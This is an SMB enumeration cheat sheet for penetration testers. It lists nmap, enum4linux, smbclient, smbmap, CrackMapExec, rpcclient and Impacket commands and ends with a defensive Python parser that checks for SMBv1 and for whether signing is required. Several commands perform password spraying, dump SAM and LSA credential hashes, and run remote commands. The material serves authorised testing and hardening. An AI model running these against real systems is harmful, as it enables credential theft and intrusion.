SMB Enumeration
SMB Protocol Versions
- SMBv1 (vulnerable, deprecated)
- SMBv2
- SMBv3
Quick Process
- Confirm SMB is open (445/139) and identify SMB version.
- Attempt null session / guest access to list shares and users.
- Enumerate shares and permissions; map read/write access.
- Collect user and group info; identify targets for password spraying.
- If creds exist, enumerate deeper (SAM, LSA, sessions, local admin).
Nmap SMB Scripts
# SMB enumeration
nmap --script smb-enum-shares,smb-enum-users -p 445 target.com
# SMB vulnerability checks (quote the glob so the shell does not expand it)
nmap --script "smb-vuln*" -p 445 target.com
# SMB OS discovery
nmap --script smb-os-discovery -p 445 target.com
# SMB protocols
nmap --script smb-protocols -p 445 target.com
# SMB security modes (signing, guest)
nmap --script smb-security-mode -p 445 target.com
# Enumerate shares with creds
nmap --script smb-enum-shares --script-args smbusername=username,smbpassword=password -p 445 target.com
Enum4linux
# Full enumeration
enum4linux -a target.com
# User enumeration
enum4linux -U target.com
# Share enumeration
enum4linux -S target.com
# Password policy
enum4linux -P target.com
# Group enumeration
enum4linux -G target.com
# With credentials
enum4linux -a -u username -p password target.com
SMBClient
# List shares
smbclient -L //target.com
# Connect to share
smbclient //target.com/share
# With credentials
smbclient //target.com/share -U username
# Anonymous access
smbclient //target.com/share -N
# Execute command
smbclient //target.com/share -c 'ls'
# Download file
smbclient //target.com/share -c 'get file.txt'
# Upload file
smbclient //target.com/share -c 'put local.txt'
# Recurse list (large shares)
smbclient //target.com/share -c 'recurse; ls'
SMBMap
# List shares
smbmap -H target.com
# With credentials
smbmap -H target.com -u username -p password
# Execute command
smbmap -H target.com -u username -p password -x 'whoami'
# Download file
smbmap -H target.com -u username -p password --download 'share\file.txt'
# Upload file
smbmap -H target.com -u username -p password --upload 'local.txt' 'share\remote.txt'
# Recursively list share contents (permissions are shown per share)
smbmap -H target.com -u username -p password -R
# Filter for writable shares (smbmap reports READ/WRITE per share by default)
smbmap -H target.com -u username -p password | grep -i 'WRITE'
CrackMapExec
# SMB enumeration
crackmapexec smb target.com
# With credentials
crackmapexec smb target.com -u username -p password
# Share enumeration
crackmapexec smb target.com -u username -p password --shares
# Password spraying
crackmapexec smb target.com -u users.txt -p password
# Dump SAM
crackmapexec smb target.com -u username -p password --sam
# Enumerate local admins
crackmapexec smb target.com -u username -p password --local-admins
# Enumerate sessions
crackmapexec smb target.com -u username -p password --sessions
# Password spraying with user list and file of passwords (keep going after a hit)
crackmapexec smb target.com -u users.txt -p passwords.txt --continue-on-success
RPC Client
# Connect with a null session (empty user, no password)
rpcclient -U "" -N target.com
# Enumerate users
rpcclient -U "" -N target.com -c "enumdomusers"
# Enumerate groups
rpcclient -U "" -N target.com -c "enumdomgroups"
# Get user info (RID 0x1f4 = 500, the built-in Administrator)
rpcclient -U "" -N target.com -c "queryuser 0x1f4"
# Enumerate domain password policy
rpcclient -U "" -N target.com -c "getdompwinfo"
# List domain aliases
rpcclient -U "" -N target.com -c "enumalsgroups domain"
# Resolve SID to name
rpcclient -U "" -N target.com -c "lookupsids S-1-5-21-..."
Impacket
# Interactive SMB client (type 'shares' to list shares, 'use <share>' to connect)
impacket-smbclient username:password@target.com
# Enumerate users and groups by cycling RIDs
impacket-lookupsid username:password@target.com
# Enumerate logged-on users (requires local admin)
impacket-wmiexec username:password@target.com "query user"
# Dump SAM hashes, LSA secrets and cached domain creds (requires local admin)
impacket-secretsdump username:password@target.com
Common Examples
# Null session share enumeration
smbclient -L //target.com -N
# Null session user enumeration
rpcclient -U "" -N target.com -c "enumdomusers"
# Authenticated share listing with domain user
smbclient -L //target.com -U 'DOMAIN\username'
# Identify SMB signing and dialects
nmap --script smb-protocols,smb-security-mode -p 445 target.com
# Check for anonymous access to IPC$
smbclient //target.com/IPC$ -N
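Added example, not part of the original cheat sheet: a small Python parser for the server's NEGOTIATE response, showing at the byte level what the `smb-protocols` and `smb-security-mode` checks above report (dialect, signing enabled, signing required, or an SMBv1 answer). The sample responses are constructed inline and `build_smb2_response` is hypothetical scaffolding, not a real server.

```python
import struct

# SMB2 DialectRevision values and SecurityMode flags from the MS-SMB2 NEGOTIATE response.
DIALECTS = {0x0202: "SMB 2.0.2", 0x0210: "SMB 2.1", 0x0300: "SMB 3.0",
            0x0302: "SMB 3.0.2", 0x0311: "SMB 3.1.1"}
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002

def parse_negotiate_response(data):
    """Parse a server's NEGOTIATE response (SMB1 or SMB2) into a dict."""
    if len(data) >= 4 and data[0] == 0x00:        # strip NetBIOS session header (port 445)
        data = data[4:]
    if data[:4] == b"\xffSMB":                    # an SMB1 answer is the finding in itself
        return {"protocol": "SMB1", "dialect": "SMB1 (deprecated)",
                "signing_enabled": None, "signing_required": None}
    if data[:4] != b"\xfeSMB":
        raise ValueError("not an SMB message")
    hdr_size, _credit, _status, command = struct.unpack_from("<HHIH", data, 4)
    if hdr_size != 64 or command != 0x0000:       # 0x0000 = SMB2 NEGOTIATE
        raise ValueError("not an SMB2 NEGOTIATE response")
    body_size, mode, dialect = struct.unpack_from("<HHH", data, 64)
    if body_size != 65:                           # fixed size of the response body
        raise ValueError("malformed NEGOTIATE response body")
    return {"protocol": "SMB2", "dialect": DIALECTS.get(dialect, hex(dialect)),
            "signing_enabled": bool(mode & SIGNING_ENABLED),
            "signing_required": bool(mode & SIGNING_REQUIRED)}

def assess(data):
    """Return the hardening gaps a defender cares about (empty list = OK)."""
    info = parse_negotiate_response(data)
    if info["protocol"] == "SMB1":
        return ["SMBv1 is offered: disable it"]
    if not info["signing_enabled"]:
        return ["SMB signing disabled"]
    if not info["signing_required"]:
        return ["SMB signing enabled but not required"]
    return []

def build_smb2_response(dialect, mode):
    """Hypothetical helper: constructed SMB2 NEGOTIATE response (64-byte header + 64-byte body)."""
    header = struct.pack("<4sHHIHHIIQIIQ16s", b"\xfeSMB", 64, 0, 0, 0, 1, 1,
                         0, 0, 0, 0, 0, bytes(16))
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, mode, dialect, 0, bytes(16),
                       0, 0x800000, 0x800000, 0x800000, 0, 0, 128, 0, 0)
    return header + body

# Constructed samples: an SMB 3.1.1 server with optional signing, and an SMB1 server.
SAMPLE_SMB311 = build_smb2_response(0x0311, SIGNING_ENABLED)
SAMPLE_SMB1 = b"\x00\x00\x00\x23" + b"\xffSMB\x72" + bytes(30)
```

Feed `assess()` the bytes captured from a NEGOTIATE exchange on port 445 (the 4-byte NetBIOS header may be left on); an empty list means SMBv1 is off and signing is required.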